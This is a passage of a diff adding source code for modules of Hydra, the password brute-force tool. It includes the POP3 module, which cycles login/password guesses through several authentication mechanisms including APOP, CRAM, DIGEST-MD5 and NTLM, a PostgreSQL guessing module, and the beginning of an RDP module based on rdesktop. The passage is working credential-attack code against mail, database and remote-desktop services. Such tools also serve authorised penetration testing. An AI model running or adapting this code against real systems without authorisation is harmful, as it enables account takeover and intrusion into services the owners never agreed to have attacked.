hydra_receive_line(sock); + } + } else { + if (buf[strlen(buf) - 1] == '\n') + buf[strlen(buf) - 1] = 0; + if (buf[strlen(buf) - 1] == '\r') + buf[strlen(buf) - 1] = 0; + if (*(ptr) == '.' || *(ptr) == '-') + resp = 1; + } + } + } while (buf != NULL && resp == 0); + return buf; +} + +int start_pop3(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = "\"\""; + char *login, *pass, buffer[500], buffer2[500]; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + while (hydra_data_ready(s) > 0) { + if ((buf = hydra_receive_line(s)) == NULL) + return 4; + free(buf); + } + + switch (p->pop3_auth_mechanism) { +#ifdef LIBOPENSSL + case AUTH_APOP:{ + MD5_CTX c; + unsigned char md5_raw[MD5_DIGEST_LENGTH]; + int i; + char *pbuffer = buffer2; + + MD5_Init(&c); + MD5_Update(&c, apop_challenge, strlen(apop_challenge)); + MD5_Update(&c, pass, strlen(pass)); + MD5_Final(md5_raw, &c); + + for (i = 0; i < MD5_DIGEST_LENGTH; i++) { + sprintf(pbuffer, "%02x", md5_raw[i]); + pbuffer += 2; + } + sprintf(buffer, "APOP %s %s\r\n", login, buffer2); + } + break; +#endif + + case AUTH_LOGIN:{ + sprintf(buffer, "AUTH LOGIN\r\n"); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 4; + if (buf[0] != '+') { + hydra_report(stderr, "[ERROR] POP3 LOGIN AUTH : %s\n", buf); + free(buf); + return 3; + } + free(buf); + strcpy(buffer2, login); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + + sprintf(buffer, "%.250s\r\n", buffer2); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 4; + + if (buf[0] != '+') { + hydra_report(stderr, "[ERROR] POP3 LOGIN AUTH : %s\n", buf); + free(buf); + return 3; + } + free(buf); + strcpy(buffer2, pass); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + sprintf(buffer, "%.250s\r\n", buffer2); + } + break; + + case AUTH_PLAIN:{ + sprintf(buffer, "AUTH PLAIN\r\n"); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 4; + if (buf[0] != '+') { + hydra_report(stderr, "[ERROR] POP3 PLAIN AUTH : %s\n", buf); + free(buf); + return 3; + } + free(buf); + + memset(buffer, 0, sizeof(buffer)); + sasl_plain(buffer, login, pass); + sprintf(buffer, "%.250s\r\n", buffer); + } + break; + +#ifdef LIBOPENSSL + case AUTH_CRAMMD5: + case AUTH_CRAMSHA1: + case AUTH_CRAMSHA256:{ + int rc = 0; + char *preplogin; + + rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin); + if (rc) { + return 3; + } + + switch (p->pop3_auth_mechanism) { + case AUTH_CRAMMD5: + sprintf(buffer, "AUTH CRAM-MD5\r\n"); + break; + case AUTH_CRAMSHA1: + sprintf(buffer, "AUTH CRAM-SHA1\r\n"); + break; + case AUTH_CRAMSHA256: + sprintf(buffer, "AUTH CRAM-SHA256\r\n"); + break; + } + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + //get the one-time BASE64 encoded challenge + + if ((buf = hydra_receive_line(s)) == NULL) + return 4; + if (buf[0] != '+') { + switch (p->pop3_auth_mechanism) { + case AUTH_CRAMMD5: + hydra_report(stderr, "[ERROR] POP3 CRAM-MD5 AUTH : %s\n", buf); + break; + case AUTH_CRAMSHA1: + hydra_report(stderr, "[ERROR] POP3 CRAM-SHA1 AUTH : %s\n", buf); + break; + case AUTH_CRAMSHA256: + hydra_report(stderr, "[ERROR] POP3 CRAM-SHA256 AUTH : %s\n", buf); + break; + } + free(buf); + return 3; + } + + memset(buffer, 0, sizeof(buffer)); + from64tobits((char *) buffer, buf + 2); + free(buf); + + memset(buffer2, 0, sizeof(buffer2)); + + switch (p->pop3_auth_mechanism) { + case AUTH_CRAMMD5:{ + sasl_cram_md5(buffer2, pass, buffer); + sprintf(buffer, "%s %.250s", preplogin, buffer2); + } + break; + case AUTH_CRAMSHA1:{ + sasl_cram_sha1(buffer2, pass, buffer); + sprintf(buffer, "%s %.250s", preplogin, buffer2); + } + break; + case AUTH_CRAMSHA256:{ + sasl_cram_sha256(buffer2, pass, buffer); + sprintf(buffer, "%s %.250s", preplogin, buffer2); + } + break; + } + hydra_tobase64((unsigned char *) buffer, strlen(buffer), sizeof(buffer)); + sprintf(buffer, "%.250s\r\n", buffer); + free(preplogin); + } + break; + + case AUTH_DIGESTMD5:{ + sprintf(buffer, "AUTH DIGEST-MD5\r\n"); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + //receive + if ((buf = hydra_receive_line(s)) == NULL) + return 4; + if (buf[0] != '+') { + hydra_report(stderr, "[ERROR] POP3 DIGEST-MD5 AUTH : %s\n", buf); + free(buf); + return 3; + } + memset(buffer, 0, sizeof(buffer)); + from64tobits((char *) buffer, buf); + free(buf); + + if (verbose) + hydra_report(stderr, "[VERBOSE] S: %s\n", buffer); + + sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "pop", NULL, 0, NULL); + if (buffer2 == NULL) + return 3; + + if (verbose) + hydra_report(stderr, "[VERBOSE] C: %s\n", buffer2); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + sprintf(buffer, "%s\r\n", buffer2); + } + break; +#endif + + case AUTH_NTLM:{ + unsigned char buf1[4096]; + unsigned char buf2[4096]; + + //Send auth request + sprintf(buffer, "AUTH NTLM\r\n"); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + //receive + if ((buf = hydra_receive_line(s)) == NULL) + return 4; + if (buf[0] != '+') { + hydra_report(stderr, "[ERROR] POP3 NTLM AUTH : %s\n", buf); + free(buf); + return 3; + } + free(buf); + //send auth and receive challenge + //send auth request: lst the server send it's own hostname and domainname + buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL); + to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2)); + + sprintf(buffer, "%s\r\n", buf1); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + if ((buf = hydra_receive_line(s)) == NULL) + return 4; + + //recover challenge + from64tobits((char *) buf1, buf + 2); + free(buf); + + //Send response + buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL); + to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2)); + + sprintf(buffer, "%s\r\n", buf1); + } + break; + default: + sprintf(buffer, "USER %.250s\r\n", login); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 4; + if (buf[0] != '+') { + hydra_report(stderr, "[ERROR] POP3 protocol or service shutdown: %s\n", buf); + free(buf); + return (3); + } + free(buf); + sprintf(buffer, "PASS %.250s\r\n", pass); + } + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + + if ((buf = hydra_receive_line(s)) == NULL) { + return 4; + } + + if (buf[0] == '+') { + hydra_report_found_host(port, ip, "pop3", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + /* special AS/400 hack */ + if (strstr(buf, "CPF2204") != NULL || strstr(buf, "CPF22E3") != NULL || strstr(buf, "CPF22E4") != NULL || strstr(buf, "CPF22E5") != NULL) { + hydra_completed_pair_skip(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + free(buf); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + + return 2; +} + +void service_pop3(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1, i; + char *ptr = NULL; + + //extract data from the pool, ip is the key + if (plist == NULL) + if (service_pop3_init(ip, sp, options, miscptr, fp, port) != 0) + hydra_child_exit(2); + p = list_find(ip); + if (p == NULL) { + hydra_report(stderr, "[ERROR] Could not find ip %s in pool\n", hydra_address2string(ip)); + return; + } + if (list_remove(p) != 0) + hydra_report(stderr, "[ERROR] Could not find ip %s in pool to free memory\n", hydra_address2string(ip)); + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + + while (1) { + switch (run) { + case 1: /* connect and service init function */ + + if (sock >= 0) + sock = hydra_disconnect(sock); + // usleep(300000); + if ((options & OPTION_SSL) == 0) { + sock = hydra_connect_tcp(ip, port); + } else { + sock = hydra_connect_ssl(ip, port); + } + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + buf = hydra_receive_line(sock); + if (buf == NULL || buf[0] != '+') { /* check the first line */ + if (verbose || debug) + hydra_report(stderr, "[ERROR] Not an POP3 protocol or service shutdown: %s\n", buf); + hydra_child_exit(2); + } + + ptr = strstr(buf, "<"); + if (ptr != NULL && buf[0] == '+') { + if (ptr[strlen(ptr) - 1] == '\n') + ptr[strlen(ptr) - 1] = 0; + if (ptr[strlen(ptr) - 1] == '\r') + ptr[strlen(ptr) - 1] = 0; + strcpy(apop_challenge, ptr); + } + free(buf); + +#ifdef LIBOPENSSL + if (!p->disable_tls) { + /* check for STARTTLS, if available we may have access to more basic auth methods */ + hydra_send(sock, "STLS\r\n", strlen("STLS\r\n"), 0); + buf = hydra_receive_line(sock); + if (buf[0] != '+') { + hydra_report(stderr, "[ERROR] TLS negotiation failed, no answer received from STARTTLS request\n"); + } else { + free(buf); + if ((hydra_connect_to_ssl(sock) == -1)) { + if (verbose) + hydra_report(stderr, "[ERROR] Can't use TLS\n"); + p->disable_tls = 1; + } else { + if (verbose) + hydra_report(stderr, "[VERBOSE] TLS connection done\n"); + } + } + } +#endif + + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_pop3(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + case 4: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(2); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + + +int service_pop3_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int myport = PORT_POP3, mysslport = PORT_POP3_SSL; + char *ptr = NULL; + int sock = -1; + char *capa_str = "CAPA\r\n"; + char *quit_str = "QUIT\r\n"; + pool p; + + p.pop3_auth_mechanism = AUTH_CLEAR; + p.disable_tls = 1; + memcpy(p.ip, ip, 36); + + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(300000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(p.ip, myport); + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(p.ip, mysslport); + } + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] pid %d terminating, can not connect\n", (int) getpid()); + return -1; + } + buf = hydra_receive_line(sock); + if (buf == NULL || buf[0] != '+') { /* check the first line */ + if (verbose || debug) + hydra_report(stderr, "[ERROR] Not an POP3 protocol or service shutdown: %s\n", buf); + return -1; + } + + ptr = strstr(buf, "<"); + if (ptr != NULL && buf[0] == '+') { + if (ptr[strlen(ptr) - 1] == '\n') + ptr[strlen(ptr) - 1] = 0; + if (ptr[strlen(ptr) - 1] == '\r') + ptr[strlen(ptr) - 1] = 0; + strcpy(apop_challenge, ptr); + } + free(buf); + + /* send capability request */ + if (hydra_send(sock, capa_str, strlen(capa_str), 0) < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Can not send the CAPABILITY request\n"); + return -1; + } + + buf = pop3_read_server_capacity(sock); + + if (buf == NULL) { + hydra_report(stderr, "[ERROR] No answer from CAPABILITY request\n"); + return -1; + } + + if ((miscptr != NULL) && (strlen(miscptr) > 0)) { + int i; + + for (i = 0; i < strlen(miscptr); i++) + miscptr[i] = (char) toupper((int) miscptr[i]); + + if (strstr(miscptr, "TLS") || strstr(miscptr, "SSL")) { + p.disable_tls = 0; + } + } + +#ifdef LIBOPENSSL + if (!p.disable_tls) { + /* check for STARTTLS, if available we may have access to more basic auth methods */ + if (strstr(buf, "STLS") != NULL) { + hydra_send(sock, "STLS\r\n", strlen("STLS\r\n"), 0); + free(buf); + buf = hydra_receive_line(sock); + if (buf[0] != '+') { + hydra_report(stderr, "[ERROR] TLS negotiation failed, no answer received from STARTTLS request\n"); + } else { + free(buf); + if ((hydra_connect_to_ssl(sock) == -1)) { + if (verbose) + hydra_report(stderr, "[ERROR] Can't use TLS\n"); + p.disable_tls = 1; + } else { + if (verbose) + hydra_report(stderr, "[VERBOSE] TLS connection done\n"); + } + if (!p.disable_tls) { + /* ask again capability request but in TLS mode */ + if (hydra_send(sock, capa_str, strlen(capa_str), 0) < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Can not send the CAPABILITY request\n"); + return -1; + } + buf = pop3_read_server_capacity(sock); + if (buf == NULL) { + hydra_report(stderr, "[ERROR] No answer from CAPABILITY request\n"); + return -1; + } + } + } + } else + hydra_report(stderr, "[ERROR] option to use TLS/SSL failed as it is not supported by the server\n"); + } +#endif + + if (hydra_send(sock, quit_str, strlen(quit_str), 0) < 0) { + //we dont care if the server is not receiving the quit msg + } + hydra_disconnect(sock); + + + if (verbose) + hydra_report(stderr, "[VERBOSE] CAPABILITY: %s", buf); + + /* example: + +OK Capability list follows: + TOP + LOGIN-DELAY 180 + UIDL + USER + SASL PLAIN LOGIN + */ + + /* according to rfc 2449: + The POP3 AUTH command [POP-AUTH] permits the use of [SASL] + authentication mechanisms with POP3. The SASL capability + indicates that the AUTH command is available and that it supports + an optional base64 encoded second argument for an initial client + response as described in the SASL specification. The argument to + the SASL capability is a space separated list of SASL mechanisms + which are supported. + */ + + /* which mean threre will *always* have a space before the LOGIN auth keyword */ + if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "NTLM") != NULL)) { + p.pop3_auth_mechanism = AUTH_NTLM; + } +#ifdef LIBOPENSSL + if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "DIGEST-MD5") != NULL)) { + p.pop3_auth_mechanism = AUTH_DIGESTMD5; + } + + if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "CRAM-SHA256") != NULL)) { + p.pop3_auth_mechanism = AUTH_CRAMSHA256; + } + + if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "CRAM-SHA1") != NULL)) { + p.pop3_auth_mechanism = AUTH_CRAMSHA1; + } + + if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "CRAM-MD5") != NULL)) { + p.pop3_auth_mechanism = AUTH_CRAMMD5; + } +#endif + + if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "PLAIN") != NULL)) { + p.pop3_auth_mechanism = AUTH_PLAIN; + } + + if (strstr(buf, " LOGIN") != NULL) { + p.pop3_auth_mechanism = AUTH_LOGIN; + } + + if (strstr(buf, "SASL") == NULL) { +#ifdef LIBOPENSSL + if (strlen(apop_challenge) == 0) { + p.pop3_auth_mechanism = AUTH_CLEAR; + } else { + p.pop3_auth_mechanism = AUTH_APOP; + } +#else + p.pop3_auth_mechanism = AUTH_CLEAR; +#endif + + } + free(buf); + + if ((miscptr != NULL) && (strlen(miscptr) > 0)) { + + if (strstr(miscptr, "CLEAR")) + p.pop3_auth_mechanism = AUTH_CLEAR; + + if (strstr(miscptr, "LOGIN")) + p.pop3_auth_mechanism = AUTH_LOGIN; + + if (strstr(miscptr, "PLAIN")) + p.pop3_auth_mechanism = AUTH_PLAIN; + +#ifdef LIBOPENSSL + if (strstr(miscptr, "APOP")) + p.pop3_auth_mechanism = AUTH_APOP; + + if (strstr(miscptr, "CRAM-MD5")) + p.pop3_auth_mechanism = AUTH_CRAMMD5; + + if (strstr(miscptr, "CRAM-SHA1")) + p.pop3_auth_mechanism = AUTH_CRAMSHA1; + + if (strstr(miscptr, "CRAM-SHA256")) + p.pop3_auth_mechanism = AUTH_CRAMSHA256; + + if (strstr(miscptr, "DIGEST-MD5")) + p.pop3_auth_mechanism = AUTH_DIGESTMD5; +#endif + + if (strstr(miscptr, "NTLM")) + p.pop3_auth_mechanism = AUTH_NTLM; + + } + + if (verbose) { + switch (p.pop3_auth_mechanism) { + case AUTH_CLEAR: + hydra_report(stderr, "[VERBOSE] using POP3 CLEAR LOGIN mechanism\n"); + break; + case AUTH_LOGIN: + hydra_report(stderr, "[VERBOSE] using POP3 LOGIN AUTH mechanism\n"); + break; + case AUTH_PLAIN: + hydra_report(stderr, "[VERBOSE] using POP3 PLAIN AUTH mechanism\n"); + break; + case AUTH_APOP: +#ifdef LIBOPENSSL + if (strlen(apop_challenge) == 0) { + hydra_report(stderr, "[VERBOSE] APOP not supported by server, using clear login\n"); + p.pop3_auth_mechanism = AUTH_CLEAR; + } else { + hydra_report(stderr, "[VERBOSE] using POP3 APOP AUTH mechanism\n"); + } +#else + p.pop3_auth_mechanism = AUTH_CLEAR; +#endif + break; +#ifdef LIBOPENSSL + case AUTH_CRAMMD5: + hydra_report(stderr, "[VERBOSE] using POP3 CRAM-MD5 AUTH mechanism\n"); + break; + case AUTH_CRAMSHA1: + hydra_report(stderr, "[VERBOSE] using POP3 CRAM-SHA1 AUTH mechanism\n"); + break; + case AUTH_CRAMSHA256: + hydra_report(stderr, "[VERBOSE] using POP3 CRAM-SHA256 AUTH mechanism\n"); + break; + case AUTH_DIGESTMD5: + hydra_report(stderr, "[VERBOSE] using POP3 DIGEST-MD5 AUTH mechanism\n"); + break; +#endif + case AUTH_NTLM: + hydra_report(stderr, "[VERBOSE] using POP3 NTLM AUTH mechanism\n"); + break; + + } + } + + if (!plist) + plist = list_create(p); + else + plist = list_insert(p); + + return 0; +} diff --git a/hydra-postgres.c b/hydra-postgres.c new file mode 100644 index 0000000..75cb0ae --- /dev/null +++ b/hydra-postgres.c @@ -0,0 +1,133 @@ + +/* + * PostgresSQL Support - by Diaul (at) devilopers.org + * + * + * 110425 no obvious memleaks found + */ + +#include "hydra-mod.h" + +#ifndef LIBPOSTGRES +void dummy_postgres() { + printf("\n"); +} +#else + +#include "libpq-fe.h" // Postgres connection functions +#include + +#define DEFAULT_DB "template1" + +extern char *HYDRA_EXIT; + +int start_postgres(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass; + char database[256]; + char connection_string[1024]; + PGconn *pgconn; + + if (miscptr) + strncpy(database, miscptr, sizeof(database)); + else + strncpy(database, DEFAULT_DB, sizeof(database)); + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + /* + * Building the connection string + */ + + + snprintf(connection_string, sizeof(connection_string), "host = '%s' dbname = '%s' user = '%s' password = '%s' ", hydra_address2string(ip), database, login, pass); + + if (verbose) + hydra_report(stderr, "connection string: %s\n", connection_string); + + pgconn = PQconnectdb(connection_string); + if (PQstatus(pgconn) == CONNECTION_OK) { + PQfinish(pgconn); + hydra_report_found_host(port, ip, "postgres", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 2; + } else { + PQfinish(pgconn); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + } + return 1; +} + +void service_postgres(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_POSTGRES, mysslport = PORT_POSTGRES_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + while (1) { + + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(275000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = 2; + break; + case 2: + /* + * Here we start the password cracking process + */ + next_run = start_postgres(sock, ip, port, options, miscptr, fp); + break; + case 3: + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +#endif + +int service_postgres_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-rdp.c b/hydra-rdp.c new file mode 100644 index 0000000..02f19ba --- /dev/null +++ b/hydra-rdp.c @@ -0,0 +1,3210 @@ + +/* + david: this module is heavily based on rdesktop v 1.7.0 + + rdesktop: A Remote Desktop Protocol client. + Protocol services - RDP layer + Copyright (C) Matthew Chapman 1999-2008 + Copyright 2003-2011 Peter Astrand for Cendio AB + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + +note: + +this module was tested on w2k, xp, w2k3, w2k8 + +in terminal services configuration, in rdp-tcp properties +in Logon Settings tab, if 'Always prompt for password' is checked, +the password can't be passed interactively so there is no way +to test the credential (unless manually). + +it's advised to lower the number of parallel tasks as RDP server +can't handle multiple connections at the same time. +It's particularly true on windows XP + +*/ + +#ifndef LIBOPENSSL +#include +void dummy_rdp() { + printf("\n"); +} +#else + +#include "rdp.h" +extern char *HYDRA_EXIT; + +BOOL g_encryption = True; +BOOL g_use_rdp5 = True; +BOOL g_console_session = False; +BOOL g_bitmap_cache = True; +BOOL g_bitmap_cache_persist_enable = False; +BOOL g_bitmap_compression = True; +BOOL g_desktop_save = True; +int g_server_depth = -1; +int os_version = 0; //2000 + +uint32 g_rdp5_performanceflags = RDP5_NO_WALLPAPER | RDP5_NO_FULLWINDOWDRAG | RDP5_NO_MENUANIMATIONS; + +/* Session Directory redirection */ +BOOL g_redirect = False; +uint32 g_redirect_flags = 0; + +uint32 g_reconnect_logonid = 0; +char g_reconnect_random[16]; +BOOL g_has_reconnect_random = False; +uint8 g_client_random[SEC_RANDOM_SIZE]; + +/* + 0 unknown + 1 success + 2 failed +*/ +#define LOGIN_UNKN 0 +#define LOGIN_SUCC 1 +#define LOGIN_FAIL 2 +int login_result = LOGIN_UNKN; + +uint8 *g_next_packet; +uint32 g_rdp_shareid; + +/* Called during redirection to reset the state to support redirection */ +void rdp_reset_state(void) { + g_next_packet = NULL; /* reset the packet information */ + g_rdp_shareid = 0; + sec_reset_state(); +} + +static void rdesktop_reset_state(void) { + rdp_reset_state(); +} + +static RDP_ORDER_STATE g_order_state; + +#define TCP_STRERROR strerror(errno) +#define TCP_BLOCKS (errno == EWOULDBLOCK) + + +#ifndef INADDR_NONE +#define INADDR_NONE ((unsigned long) -1) +#endif + +#define STREAM_COUNT 1 + + +int g_sock; +static struct stream g_in; +static struct stream g_out[STREAM_COUNT]; + +/* wait till socket is ready to write or timeout */ +static BOOL tcp_can_send(int sck, int millis) { + fd_set wfds; + struct timeval time; + int sel_count; + + time.tv_sec = millis / 1000; + time.tv_usec = (millis * 1000) % 1000000; + FD_ZERO(&wfds); + FD_SET(sck, &wfds); + sel_count = select(sck + 1, 0, &wfds, 0, &time); + if (sel_count > 0) { + return True; + } + return False; +} + +/* Initialise TCP transport data packet */ +STREAM tcp_init(uint32 maxlen) { + static int cur_stream_id = 0; + STREAM result = NULL; + + result = &g_out[cur_stream_id]; + cur_stream_id = (cur_stream_id + 1) % STREAM_COUNT; + + + if (maxlen > result->size) { + result->data = (uint8 *) xrealloc(result->data, maxlen); + result->size = maxlen; + } + + result->p = result->data; + result->end = result->data; // + result->size; + return result; +} + +/* Send TCP transport data packet */ +void tcp_send(STREAM s) { + int length = s->end - s->data; + int sent, total = 0; + + + while (total < length) { + sent = hydra_send(g_sock, (char *) (s->data + total), length - total, 0); + if (sent <= 0) { + if (sent == -1 && TCP_BLOCKS) { + tcp_can_send(g_sock, 100); + sent = 0; + } else { + if (g_sock && !login_result) + error("send: %s\n", TCP_STRERROR); + return; + } + } + total += sent; + } +} + +/* Receive a message on the TCP layer */ +STREAM tcp_recv(STREAM s, uint32 length) { + uint32 new_length, end_offset, p_offset; + int rcvd = 0; + + if (s == NULL) { + /* read into "new" stream */ + g_in.data = (uint8 *) xmalloc(length); + g_in.size = length; + g_in.end = g_in.p = g_in.data; + s = &g_in; + } else { + /* append to existing stream */ + new_length = (s->end - s->data) + length; + if (new_length > s->size) { + p_offset = s->p - s->data; + end_offset = s->end - s->data; +//printf("length: %d, %p s->data, %p +%d s->p, %p +%d s->end, end-data %d, size %d\n", length, s->data, s->p, s->p - s->data, s->end, s->end - s->p, s->end - s->data, s->size); + s->data = (uint8 *) xrealloc(s->data, new_length); + s->size = new_length; + s->p = s->data + p_offset; + s->end = s->data + end_offset; + } + } + + + while (length > 0) { + rcvd = hydra_recv(g_sock, (char *) s->end, length); + if (rcvd < 0) { + if (rcvd == -1 && TCP_BLOCKS) { + rcvd = 0; + } else { + //error("recv: %s\n", TCP_STRERROR); + return NULL; + } + } else if (rcvd == 0) { + error("Connection closed\n"); + return NULL; + } + s->end += rcvd; + length -= rcvd; + } + + + return s; +} + +char *tcp_get_address() { + static char ipaddr[32]; + struct sockaddr_in sockaddr; + socklen_t len = sizeof(sockaddr); + + if (getsockname(g_sock, (struct sockaddr *) &sockaddr, &len) == 0) { + uint8 *ip = (uint8 *) & sockaddr.sin_addr; + + sprintf(ipaddr, "%d.%d.%d.%d", ip[0], ip[1], ip[2], ip[3]); + } else + strcpy(ipaddr, "127.0.0.1"); + return ipaddr; +} + +/* reset the state of the tcp layer */ +void tcp_reset_state(void) { + int i; + + g_sock = -1; /* reset socket */ + + /* Clear the incoming stream */ + if (g_in.data != NULL) + free(g_in.data); + g_in.p = NULL; + g_in.end = NULL; + g_in.data = NULL; + g_in.size = 0; + g_in.iso_hdr = NULL; + g_in.mcs_hdr = NULL; + g_in.sec_hdr = NULL; + g_in.rdp_hdr = NULL; + g_in.channel_hdr = NULL; + + /* Clear the outgoing stream(s) */ + for (i = 0; i < STREAM_COUNT; i++) { + if (g_out[i].data != NULL) + free(g_out[i].data); + g_out[i].p = NULL; + g_out[i].end = NULL; + g_out[i].data = NULL; + g_out[i].size = 0; + g_out[i].iso_hdr = NULL; + g_out[i].mcs_hdr = NULL; + g_out[i].sec_hdr = NULL; + g_out[i].rdp_hdr = NULL; + g_out[i].channel_hdr = NULL; + } +} + +uint16 g_mcs_userid; + +/* Parse an ASN.1 BER header */ +static BOOL ber_parse_header(STREAM s, int tagval, int *length) { + int tag, len; + + + if (tagval > 0xff) { + in_uint16_be(s, tag); + } else { + in_uint8(s, tag); + } + + if (tag != tagval) { + error("expected tag %d, got %d\n", tagval, tag); + return False; + } + + in_uint8(s, len); + + if (len & 0x80) { + len &= ~0x80; + *length = 0; + while (len--) + next_be(s, *length); + } else + *length = len; + + return s_check(s); +} + +/* Output an ASN.1 BER header */ +static void ber_out_header(STREAM s, int tagval, int length) { + + + if (tagval > 0xff) { + out_uint16_be(s, tagval); + } else { + out_uint8(s, tagval); + } + + if (length >= 0x80) { + out_uint8(s, 0x82); + out_uint16_be(s, length); + } else + out_uint8(s, length); +} + +/* Output an ASN.1 BER integer */ +static void ber_out_integer(STREAM s, int value) { + ber_out_header(s, BER_TAG_INTEGER, 2); + out_uint16_be(s, value); +} + +/* Output a DOMAIN_PARAMS structure (ASN.1 BER) */ +static void mcs_out_domain_params(STREAM s, int max_channels, int max_users, int max_tokens, int max_pdusize) { + ber_out_header(s, MCS_TAG_DOMAIN_PARAMS, 32); + ber_out_integer(s, max_channels); + ber_out_integer(s, max_users); + ber_out_integer(s, max_tokens); + ber_out_integer(s, 1); /* num_priorities */ + ber_out_integer(s, 0); /* min_throughput */ + ber_out_integer(s, 1); /* max_height */ + ber_out_integer(s, max_pdusize); + ber_out_integer(s, 2); /* ver_protocol */ +} + +/* Parse a DOMAIN_PARAMS structure (ASN.1 BER) */ +static BOOL mcs_parse_domain_params(STREAM s) { + int length = 0; + + ber_parse_header(s, MCS_TAG_DOMAIN_PARAMS, &length); + in_uint8s(s, length); + + return s_check(s); +} + +/* Send an MCS_CONNECT_INITIAL message (ASN.1 BER) */ +static void mcs_send_connect_initial(STREAM mcs_data) { + int datalen = mcs_data->end - mcs_data->data; + int length = 9 + 3 * 34 + 4 + datalen; + 